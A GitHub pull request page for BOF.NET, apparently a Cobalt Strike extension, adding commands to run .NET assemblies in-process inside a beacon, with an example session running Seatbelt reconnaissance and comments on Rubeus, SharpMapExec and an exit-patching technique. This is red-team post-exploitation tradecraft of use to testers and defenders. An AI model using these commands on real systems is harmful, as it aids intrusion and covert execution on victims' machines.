Added bofnet_executeassembly for calling entry point on standard .NET assemblies by williamknows · Pull Request #1 · CCob/BOF.NET · GitHub

Added bofnet_executeassembly for calling entry point on standard .NET assemblies #1


Open: wants to merge 14 commits into base: main

Conversation

williamknows

Adds bofnet_executeassembly function to execute standard .NET assemblies in-process through BOF.NET. Arguments can be optionally supplied.

Console output is captured in a memory stream then returned through BeaconConsole.WriteLine().

Thanks for the tip on Twitter for getting this working!

Example Command Sequence

bofnet_init
bofnet_load /path/to/assembly.exe
bofnet_listassemblies
bofnet_executeassembly AssemblyName argument1 argument2 

Example with Seatbelt

beacon> bofnet_init
[*] Initializing BOFNET
[+] host called home, sent: 488097 bytes
[+] received output:
[+] BOFNET Runtime Initalized, assembly size 481280, .NET Runtime Version: 4.0.30319.42000 in AppDomain BOFNET

beacon> bofnet_load /mnt/hgfs/Shared/Seatbelt/Seatbelt/bin/Release/Seatbelt.exe
[*] Attempting to load large .NET assembly /mnt/hgfs/Shared/Seatbelt/Seatbelt/bin/Release/Seatbelt.exe into BOFNET
[+] host called home, sent: 554690 bytes
[+] received output:
[+] Setting up new loader with unique id 9OfYojDS
[+] Loaded assembly Seatbelt, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null successfully

beacon> bofnet_listassemblies
[*] Listing loaded BOFNET assemblies
[+] host called home, sent: 6820 bytes
[+] received output:
BOFNET: BOFNET, Version=1.0.1.0, Culture=neutral, PublicKeyToken=null
Seatbelt: Seatbelt, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null

beacon> bofnet_executeassembly Seatbelt WindowsFirewall
[*] Execute a standard .NET assembly
[+] host called home, sent: 6848 bytes
[+] received output:


                        %&&@@@&&                                                                                  
                        &&&&&&&%%%,                       #&&@@@@@@%%%%%%###############%                         
                        &%&   %&%%                        &////(((&%%%%%#%################//((((###%%%%%%%%%%%%%%%
%%%%%%%%%%%######%%%#%%####%  &%%**#                      @////(((&%%%%%%######################(((((((((((((((((((
#%#%%%%%%%#######%#%%#######  %&%,,,,,,,,,,,,,,,,         @////(((&%%%%%#%#####################(((((((((((((((((((
#%#%%%%%%#####%%#%#%%#######  %%%,,,,,,  ,,.   ,,         @////(((&%%%%%%%######################(#(((#(#((((((((((
#####%%%####################  &%%......  ...   ..         @////(((&%%%%%%%###############%######((#(#(####((((((((
#######%##########%#########  %%%......  ...   ..         @////(((&%%%%%#########################(#(#######((#####
###%##%%####################  &%%...............          @////(((&%%%%%%%%##############%#######(#########((#####
#####%######################  %%%..                       @////(((&%%%%%%%################                        
                        &%&   %%%%%      Seatbelt         %////(((&%%%%%%%%#############*                         
                        &%%&&&%%%%%        v1.1.1         ,(((&%%%%%%%%%%%%%%%%%,                                 
                         #%%%%##,                                                                                 


====== WindowsFirewall ======

Collecting Windows Firewall Non-standard Rules


Location                     : SOFTWARE\Policies\Microsoft\WindowsFirewall

Location                     : SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy

Domain Profile
    Enabled                  : True
    DisableNotifications     : False
    DefaultInboundAction     : ALLOW
    DefaultOutboundAction    : ALLOW

Public Profile
    Enabled                  : True
    DisableNotifications     : False
    DefaultInboundAction     : ALLOW
    DefaultOutboundAction    : ALLOW

Standard Profile
    Enabled                  : True
    DisableNotifications     : False
    DefaultInboundAction     : ALLOW
    DefaultOutboundAction    : ALLOW



[*] Completed collection in 0.056 seconds

@ogue
ogue commented Aug 11, 2021

Is this going to be merged soon ?

@CCob
Owner
CCob commented Aug 11, 2021

Is this going to be merged soon ?

Sorry, I cannot merge this as it conflicts with an internal version we have of the same BOF but implemented differently.

@NotoriousRebel

Thanks for this awesome PR. I have noticed that, depending on how args are passed, something under the hood fails to properly parse the args and pass them to the .NET assembly being invoked, which causes the program to crash. For example, with Seatbelt: -group=all -full, Rubeus commands, SharpMapExec, etc... This leads to the user having to hardcode their arguments, which is not ideal. I believe the problem stems from how arguments are parsed within the aggressor script. Perhaps it would be more practical to parse arguments based on IEA's aggressor script, which handles more sophisticated arguments correctly.

@NotoriousRebel

@williamknows Have you had a chance to look? I am going to attempt to modify the aggressor script some time to fix this issue but wasn't sure if you already have.

@williamknows
Author
williamknows commented Sep 16, 2021

Hey, sorry for the slow reply, only realised today when I saw this thread pop up on Slack.

To test this, I wrote a quick assembly that just prints the arguments. As shown below, they make it through fine:

image

I suspect there's a few different issues here.

For SeatBelt, given the arguments above work, I think it's just that that particular command takes: (1) a long time to execute when doing the full enumeration (often > 5 minutes); (2) it generates a huge amount of data to send back, which takes a while to filter back (e.g., check the memory usage which rapidly rises to > 100MB).

The fact that bofnet_executeassembly hangs until completion I think could be a false indicator that it's died, but really it hasn't. I'll probably look into trying a bofnet_job implementation soon (although hopefully CCob will release the internal code before ;) ).

For Rubeus and SharpMapExec I'm honestly not so sure. Do you have any example commands? I know they both have some Environment.Exit() calls which may be the root of the issue.

For this I've just pushed functionality for a bofnet_patchexit command which uses MDSec's approach they documented a while ago (see here). This may fix it, let me know if not.

Note that this now compiles BOF.NET with the /unsafe flag which may introduce other issues. At some point I'll try and re-write that too.

@williamknows
Author

Just pushed a bofnet_jobassembly implementation for background assembly execution. @NotoriousRebel give this a try. It's a nicer approach, as apart from not blocking during execution, if you run bofnet_jobs you can see if it's still running (Active: True). It also follows the standard bofnet_job approach of being able to return console output during execution.

It's limited to one assembly at a time due to the way it's capturing standard output. Capturing on a per assembly basis is possible, but the code requires a lot more thought. You can still run standard bofnet_job(s) in parallel though.

@CCob I've left this open in case anyone finds it useful until your implementation hits the public code, but if you want to close it, certainly no drama from me. Thanks again for the awesome project.
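The one-assembly-at-a-time limitation described above comes from how console capture works in .NET: Console.SetOut replaces a single process-wide writer, so whatever is redirected captures every caller's output, not just one assembly's. The following stand-alone C# illustration is an added example, not code from BOF.NET or from this PR; the class and method names (ConsoleCapture, Capture) are made up for the demonstration, and the "job A" / "job B" writes stand in for two assemblies running at the same time.

```csharp
using System;
using System.IO;

// Added illustration (not BOF.NET code): shows why redirecting Console.Out
// can only isolate one running assembly's output at a time.
public static class ConsoleCapture
{
    // Runs `work` with Console.Out redirected into a StringWriter and returns
    // everything written during the call. The original writer is always
    // restored so later output is not lost.
    public static string Capture(Action work)
    {
        TextWriter original = Console.Out;
        var buffer = new StringWriter();
        Console.SetOut(buffer);
        try
        {
            work();
            Console.Out.Flush();
        }
        finally
        {
            Console.SetOut(original);
        }
        return buffer.ToString();
    }

    public static void Main()
    {
        // Single job: its output is isolated as expected.
        string single = Capture(() => Console.WriteLine("job A, line 1"));
        Console.Write("single capture -> " + single);

        // Two overlapping jobs: Console.Out is process-global, so the moment
        // job B redirects it, job A's remaining lines land in B's buffer.
        TextWriter original = Console.Out;
        var bufferA = new StringWriter();
        var bufferB = new StringWriter();

        Console.SetOut(bufferA);
        Console.WriteLine("job A, line 1");   // captured for A

        Console.SetOut(bufferB);              // job B starts while A still runs
        Console.WriteLine("job A, line 2");   // written by A, captured for B
        Console.WriteLine("job B, line 1");   // captured for B

        Console.SetOut(original);

        Console.WriteLine("buffer A contains:");
        Console.Write(bufferA.ToString());    // only "job A, line 1"
        Console.WriteLine("buffer B contains:");
        Console.Write(bufferB.ToString());    // "job A, line 2" and "job B, line 1"
    }
}
```

Per-assembly capture would need each assembly's writes tagged with their origin (for example a writer keyed on the executing AppDomain or thread), which is the "a lot more thought" the comment above refers to; a plain Console.SetOut cannot tell two callers apart.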

@CCob
Owner
CCob commented Sep 19, 2021

Great stuff. I will leave it open for others to take advantage of the PR.
